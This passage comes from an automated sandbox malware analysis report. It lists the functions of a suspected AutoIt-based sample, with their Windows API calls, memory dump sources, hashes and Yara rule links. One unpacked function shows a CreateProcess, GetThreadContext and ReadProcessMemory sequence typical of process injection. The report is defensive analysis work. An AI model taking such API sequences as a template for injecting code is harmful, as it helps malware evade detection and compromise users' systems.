                                                            • Opcode ID: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
                                                            • Instruction ID: 37539c4cc2624dfb2c6dbd2fc15eeffed4c46528cedee32ec6ea63b875383793
                                                            • Opcode Fuzzy Hash: a3ac00fff01ca316bcc29c4708e9ff73ad8aa5bdfaa4624fb4ddface27b7cf64
                                                            • Instruction Fuzzy Hash: 5A118C71A08341DFD711EF28DC4591ABBE8EB85750F50856EF0808B2B1DBB09646CB96
                                                            Function 00380DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
                                                              • Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
                                                              • Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                            • std::exception::exception.LIBCMT ref: 00380DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00380E01
                                                              • Part of subcall function 0038859B: RaiseException.KERNEL32(?,?,?,00419E78,00000000,?,?,?,?,00380E06,?,00419E78,?,00000001), ref: 003885F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: bf535fe6b2d29f5fe73fe1befda017c5b40f1cf14fad56cb385ec20c5ff9e16a
                                                            • Instruction ID: 318c5d5e731fe41b6fef26192fb0546246f95aa7a1db71706a4fd8d4d9a32628
                                                            • Opcode Fuzzy Hash: bf535fe6b2d29f5fe73fe1befda017c5b40f1cf14fad56cb385ec20c5ff9e16a
                                                            • Instruction Fuzzy Hash: 34F0F43540031EA6CB17BBA5EC019EF7BAC9F01310F1004A6FD149A281DFB09A8883D1
                                                            Function 003853A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            • __lock_file.LIBCMT ref: 003853EB
                                                              • Part of subcall function 00386C11: __lock.LIBCMT ref: 00386C34
                                                            • __fclose_nolock.LIBCMT ref: 003853F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
                                                            • Instruction ID: a87f1ecb5b7b55af8e1c857d4cd5a220cb19d91c3e6b99c2eea45e993a0708cf
                                                            • Opcode Fuzzy Hash: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
                                                            • Instruction Fuzzy Hash: 43F0B431801B049ADB23BF7598067AD7BE06F41375F6582C9E424AF1C1CFFC8A419B52
                                                            Function 0167006D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0167082B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016708C1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016708E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                            • Instruction ID: fc82ff88f358bfe4b734a85c049eb1fe98b8c490a1ffc527bdab885b56a37cae
                                                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                            • Instruction Fuzzy Hash: 2B12D024E14658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CF5A
                                                            Function 00380C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 4d7b0a8849ebf0008d9c4bbb4d330e655d8fbd9f62c57faa3419a71fbf22d6f9
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 5131E270A002059FCB9AEF58C494A69F7B6FB49300B2586E5E80ACF751D631EEC5DB80
                                                            Function 0039FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 5fd267d560e21896429c116da98e99c5eaa524eb6c158d503fee6182e208e642
                                                            • Instruction ID: 2ee5b246e636f77ed7685bf23557f6219090282e0d45dbf482b9ed6a9367c98e
                                                            • Opcode Fuzzy Hash: 5fd267d560e21896429c116da98e99c5eaa524eb6c158d503fee6182e208e642
                                                            • Instruction Fuzzy Hash: 754127745047518FDB26DF24C454B1ABBE0BF45318F09C8ACE89A9B766C732E845CF52
                                                            Function 00367B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: f1d7be7cac5c32277863267ba6aeac5e7e65b067ee197808cbf6780ae42cdb2b
                                                            • Instruction ID: 9723ef57a606e467007e1a75d087b4233bbe752d0240b076cf5a85b95976760f
                                                            • Opcode Fuzzy Hash: f1d7be7cac5c32277863267ba6aeac5e7e65b067ee197808cbf6780ae42cdb2b
                                                            • Instruction Fuzzy Hash: 1C213672604B09EBDF169F11F8417AA7BB8FB14350F21C46DE486CA194EB3095D0CB49
                                                            Function 00364DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00364BEF
                                                              • Part of subcall function 0038525B: __wfsopen.LIBCMT ref: 00385266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F
                                                              • Part of subcall function 00364B6A: FreeLibrary.KERNEL32(00000000), ref: 00364BA4
                                                              • Part of subcall function 00364C70: _memmove.LIBCMT ref: 00364CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
                                                            • Instruction ID: fb2d8bf72d85372810e1b8339cb9e3da24de277cfe77e1771f4808bf14f36c04
                                                            • Opcode Fuzzy Hash: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
                                                            • Instruction Fuzzy Hash: 4211E331A00205ABCF13BF70C816FAD77A8AF44710F10C829F541AF1C5DEB29A009BA1
                                                            Function 0039FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: a43f8f8049fd479b58bf00a574812a689629082e70e6b6088c94004492940c15
                                                            • Instruction ID: f7cd2dded75aecf3129e27e4acb6a248c304ababda98aea73f2a880455e7be0d
                                                            • Opcode Fuzzy Hash: a43f8f8049fd479b58bf00a574812a689629082e70e6b6088c94004492940c15
                                                            • Instruction Fuzzy Hash: A2211374908741DFCB26DF64C454A1ABBE4BF88314F05896CF88A9B762D731E809CF92
                                                            Function 0038072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
                                                            • Instruction ID: 933d014c8b5d0bfcb88b19bafd2a9c78d90a05b2f2c92ff0dda46ebec127eadd
                                                            • Opcode Fuzzy Hash: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
                                                            • Instruction Fuzzy Hash: 3E01D671446944AFD712CB24E8C1EF877E8EF86220B1505E6ED48CBC35C62098D8CB91
                                                            Function 00384863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 003848A6
                                                              • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
                                                            • Instruction ID: 77f984f156d0bbc1a34e58e5152bdc821f53183d951162d0cb54838bc28d98ea
                                                            • Opcode Fuzzy Hash: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
                                                            • Instruction Fuzzy Hash: 38F0C23190070AEBDF13BFB48C067EE3AA1AF00325F558494F4249E592CB79CA51DF51
                                                            Function 00364E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
                                                            • Instruction ID: 1edd2c9a8ad3afe7e143aee22228db0f724ebc5ceceedf6b616bd719dfda4076
                                                            • Opcode Fuzzy Hash: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
                                                            • Instruction Fuzzy Hash: BEF01571901B11CFCB369F64E494812BBE5BF14329321CA7EE1D686A24C7739840DB40
                                                            Function 00380791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
                                                            • Instruction ID: 863b9c71ffb9d930ee4711c2f0b203e07620095b8c090898e79d59ba1bc8a9d9
                                                            • Opcode Fuzzy Hash: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
                                                            • Instruction Fuzzy Hash: BAE0CD369041285BC721D6589C05FFA77DDDF897A0F0442B5FD0CDB248DA609C8086D0
                                                            Function 0038525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: a4d3d7d242977b5a8b57a95baa685f8487ac5c22ea5aac9b9a86dafda0d054ca
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: C5B0927644020C77CE022A82EC02A493B299B41764F408060FB0C1C162AA73A6649A89
                                                            Function 01671070 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 01671081
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 88df8f8f3c2bde27b6fd1fa1a85093f13fe3fdc343a5e5bdcba27343327129e9
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 29E0E67494020DDFDB00EFB4DA496AE7FB4EF04301F100161FD05D2281DA309D50CA62

                                                            Non-executed Functions

                                                            Function 003ECABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003ECB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003ECBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECC00
                                                            • SendMessageW.USER32 ref: 003ECC29
                                                            • _wcsncpy.LIBCMT ref: 003ECC95
                                                            • GetKeyState.USER32(00000011), ref: 003ECCB6
                                                            • GetKeyState.USER32(00000009), ref: 003ECCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECCD9
                                                            • GetKeyState.USER32(00000010), ref: 003ECCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECD0C
                                                            • SendMessageW.USER32 ref: 003ECD33
                                                            • SendMessageW.USER32(?,00001030,?,003EB348), ref: 003ECE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003ECE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003ECE60
                                                            • SetCapture.USER32(?), ref: 003ECE69
                                                            • ClientToScreen.USER32(?,?), ref: 003ECECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003ECEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003ECEF5
                                                            • ReleaseCapture.USER32 ref: 003ECF00
                                                            • GetCursorPos.USER32(?), ref: 003ECF3A
                                                            • ScreenToClient.USER32(?,?), ref: 003ECF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ECFA3
                                                            • SendMessageW.USER32 ref: 003ECFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED00E
                                                            • SendMessageW.USER32 ref: 003ED03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003ED05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003ED06D
                                                            • GetCursorPos.USER32(?), ref: 003ED08D
                                                            • ScreenToClient.USER32(?,?), ref: 003ED09A
                                                            • GetParent.USER32(?), ref: 003ED0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ED123
                                                            • SendMessageW.USER32 ref: 003ED154
                                                            • ClientToScreen.USER32(?,?), ref: 003ED1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003ED1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED20C
                                                            • SendMessageW.USER32 ref: 003ED22F
                                                            • ClientToScreen.USER32(?,?), ref: 003ED281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003ED2B5
                                                              • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003ED351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pbB
                                                            • API String ID: 3977979337-2595871605
                                                            • Opcode ID: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
                                                            • Instruction ID: f0f56e86ba83f277df28317c02081c8e4a4f6e27bbde4262c5521dddf4c2a8e3
                                                            • Opcode Fuzzy Hash: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
                                                            • Instruction Fuzzy Hash: 9E42CD342042D1AFDB26DF26C884AAABBE9FF49310F150A29F555CB2F0C771D852DB91
                                                            Function 00376F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: ]A$3c7$DEFINE$P\A$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_7
                                                            • API String ID: 1357608183-3946336730
                                                            • Opcode ID: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
                                                            • Instruction ID: c404c411815d4621a5abf846e174d230fb8318a6e7c93d6c25fc525735fd8ed9
                                                            • Opcode Fuzzy Hash: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
                                                            • Instruction Fuzzy Hash: B793B375E00215DBDB26CF58C881BEDB7B1FF48314F25816AEA49EB681E7749E81CB40
